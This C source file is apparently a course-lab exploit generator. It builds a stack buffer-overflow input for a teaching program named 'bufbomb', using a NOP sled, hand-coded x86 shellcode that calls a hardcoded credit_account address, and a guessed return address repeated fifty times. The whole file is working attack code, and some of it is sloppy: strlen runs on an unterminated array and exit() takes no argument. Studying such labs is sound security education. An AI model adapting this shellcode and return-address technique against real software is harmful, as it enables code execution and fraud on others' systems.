#include <string.h>
#include <stdio.h>

unsigned long get_sp(void) {
  __asm__("movl %esp,%eax");
}

/* Generates a string that will make bufbomb call credit_account
*/
unsigned char pgm[] = { 
  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
  0x81, 0xc4, 0x70, 0xfe, 0xff, 0xff, 0xeb, 0x16,
  0x58, 0x31, 0xc9, 0x88, 0x48, 0x08, 0x66, 0x81,
  0xc1, 0xe8, 0x03, 0x51, 0x50, 0xb8, 0x18, 0x86,
  0x04, 0x08, 0xff, 0xd0, 0xc9, 0xc3, 0xe8, 0xe5,
  0xff, 0xff, 0xff, 0x68, 0x6f, 0x6c, 0x6c, 0x69,
  0x6e, 0x67, 0x64, 0x01 };
/* This value depends on the target program - it is a guess of the
   new return-address */


   
unsigned int target = 0xbfbff17c;
// 0xbfffe820;

// 0x0xbfffd1e8; // 0xbffff8f4;  

int main(int argc, char **argv) {
  unsigned char bigbuff[10000];
  int i;
  int n = strlen(pgm);
  int sp = get_sp();
  fprintf(stderr,"initial sp %x\n",sp);
  if (argc!=2) {
    printf("Error - need an offset\n");
    exit();
  }

  target += atoi(argv[1]);
  //  target = sp+atoi(argv[1]);
  fprintf(stderr,"using %x\n",target);

  memcpy(bigbuff,pgm,n);
  for (i=0;i<50;i++) {
    memcpy(bigbuff+n+i*4,&target,4);
  }
  write(1,"rotor\n",6);
  write(1,bigbuff,n+4*50); 
  write(1,"\n",1);
}